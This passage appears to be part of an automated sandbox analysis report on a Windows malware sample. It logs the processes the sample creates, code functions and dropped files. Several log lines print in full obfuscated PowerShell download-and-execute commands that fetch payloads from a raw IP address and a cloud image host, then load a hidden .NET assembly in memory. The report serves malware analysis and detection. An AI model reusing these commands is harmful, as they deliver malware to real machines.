                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027F9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,17_2_027F9247
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04204062 push ss; ret 8_2_0420406A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04204162 push ds; ret 8_2_0420416A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04204268 pushfd ; ret 8_2_04204271
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040134A pushfd ; retf 13_2_00401353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004012F2 pushfd ; retf 13_2_004012F3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_3_05879719 push eax; ret 17_3_05879725
                Source: C:\Windows\explorer.exeCode function: 18_2_0019A055 push es; iretd 18_2_0019A05D
                Source: C:\Windows\explorer.exeCode function: 18_2_00191405 push esi; ret 18_2_00191407
                Source: C:\Windows\explorer.exeCode function: 18_2_001947A7 push esp; iretd 18_2_001947A8
                Source: C:\Windows\explorer.exeCode function: 18_2_001914D4 push esi; ret 18_2_001914D6
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F538A7 push esp; iretd 19_2_02F538A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F594E6 push edx; ret 19_2_02F594E7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F5967E push ds; retf 19_2_02F59680
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA87CE push es; ret 20_2_02CA8A18
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA8EEF push edi; ret 20_2_02CA8EF0
                Source: C:\Windows\explorer.exeCode function: 21_2_005D1405 push esi; ret 21_2_005D1407
                Source: C:\Windows\explorer.exeCode function: 21_2_005D14D4 push esi; ret 21_2_005D14D6
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02793417 push esp; iretd 22_2_02793418
                Source: C:\Windows\explorer.exeCode function: 26_2_005D14D4 push esi; ret 26_2_005D14D6
                Source: C:\Windows\explorer.exeCode function: 26_2_005D1405 push esi; ret 26_2_005D1407
                Source: C:\Windows\explorer.exeCode function: 26_2_005D45A7 push esp; iretd 26_2_005D45A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02793627 push esp; iretd 27_2_02793628
                Source: C:\Windows\explorer.exeCode function: 28_2_0014AAD2 push ebp; iretd 28_2_0014AAD3
                Source: C:\Windows\explorer.exeCode function: 28_2_0014AC8D push esp; iretd 28_2_0014AC95
                Source: C:\Windows\explorer.exeCode function: 28_2_00144817 push esp; iretd 28_2_00144818
                Source: C:\Windows\explorer.exeCode function: 28_2_00141405 push esi; ret 28_2_00141407
                Source: C:\Windows\explorer.exeCode function: 28_2_001414D4 push esi; ret 28_2_001414D6
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\icgfugfJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\icgfugfJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\icgfugf:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
